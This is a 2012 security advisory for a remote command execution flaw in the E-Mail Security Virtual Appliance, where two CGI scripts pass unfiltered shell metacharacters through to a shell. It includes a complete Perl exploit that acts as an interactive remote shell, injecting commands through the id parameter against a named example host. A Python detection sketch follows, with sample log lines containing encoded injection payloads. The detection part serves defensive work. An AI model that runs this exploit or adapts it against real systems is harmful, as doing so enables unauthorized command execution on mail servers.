E-Mail Security Virtual Appliance (ESVA) Remote Execution Exploit

Summary

E-Mail Security Virtual Appliance (ESVA) is prone to a remote command execution vulnerability.

Credit:

The information has been provided by iJoo.


Details

Vulnerable Systems:
 * E-Mail Security Virtual Appliance (ESVA)

-=+ Affected Files

…./cgi-bin/learn-msg.cgi
…./cgi-bin/release-msg.cgi

These scripts do not strip or filter shell metacharacters in their input.
An attacker can therefore easily execute commands through them.

-=+ Simple RCE ESVA

#!/usr/bin/perl
use LWP;
use HTTP::Request;
if (@ARGV < 1)
{
    print "\n==========================================\n";
    print " ESVA - REMOTE EXECUTION SCRIPT \n";
    print "==========================================\n";
    print "Usage: perl esva.pl host (without http://)\n";
    print "Ex. perl esva.pl www.korban.com\n";
    exit;
}
$host=$ARGV[0];
print "Try to Execution Command!\n";
print "iDSc-shell# ";
chomp( $cmd = <STDIN>);
while($cmd !~ 'exit')
{
    $content = '';
    $ua = LWP::UserAgent->new();
    $ua->agent('');
    # The id parameter is sent as %7c<cmd>%3b, i.e. "|<cmd>;" after URL decoding.
    $request = HTTP::Request->new (GET => 'http://'.$host.'/cgi-bin/learn-msg.cgi?id=%7c'.$cmd.'%3b');
    $response = $ua->request ($request);
    $content = $response->content;
    print $content."\n";
    print "iDSc-shell# ";
    chomp( $cmd = <STDIN>);
}
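
The request shape used by the script above can be searched for in web server access logs. The following Python sketch is an added example, not part of the original advisory or of ESVA's code; the combined log format, the allowlist for legitimate id values and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# CGI scripts named in the advisory (their install prefix is elided there).
AFFECTED = ("/cgi-bin/learn-msg.cgi", "/cgi-bin/release-msg.cgi")
# Assumption: a legitimate id is a short token of letters, digits, '.', '_' or '-'.
SAFE_ID = re.compile(r"[A-Za-z0-9._-]{1,64}")
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def id_values(query):
    """Yield every id parameter, percent-decoded twice to expose double encoding."""
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == "id":
            yield unquote_plus(unquote_plus(value))

def scan(lines):
    """Return (client, path, decoded id) for requests whose id fails the allowlist."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        path = unquote(path)
        if not any(script in path for script in AFFECTED):
            continue
        client = line.split(" ", 1)[0]
        hits += [(client, path, v) for v in id_values(query)
                 if not SAFE_ID.fullmatch(v)]
    return hits

# Constructed sample log lines (documentation addresses, harmless commands).
SAMPLE = [
    '192.0.2.10 - - [16/Aug/2012:10:00:01 +0000] "GET /cgi-bin/learn-msg.cgi?id=4F2A1B3C5D.A1B2C HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Aug/2012:10:02:13 +0000] "GET /cgi-bin/learn-msg.cgi?id=%7cid%3b HTTP/1.1" 200 64 "-" ""',
    '198.51.100.7 - - [16/Aug/2012:10:02:20 +0000] "GET /cgi-bin/release-msg.cgi?id=%257cuname%2520-a%253b HTTP/1.1" 200 80 "-" ""',
    '192.0.2.10 - - [16/Aug/2012:10:05:00 +0000] "GET /index.html?id=%7c HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Tighten SAFE_ID to the message-id format the appliance actually generates before relying on the results, since the pattern here is only a guess at that format.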

Disclosure Timeline:
Published: 2012-08-16

Categories: Exploits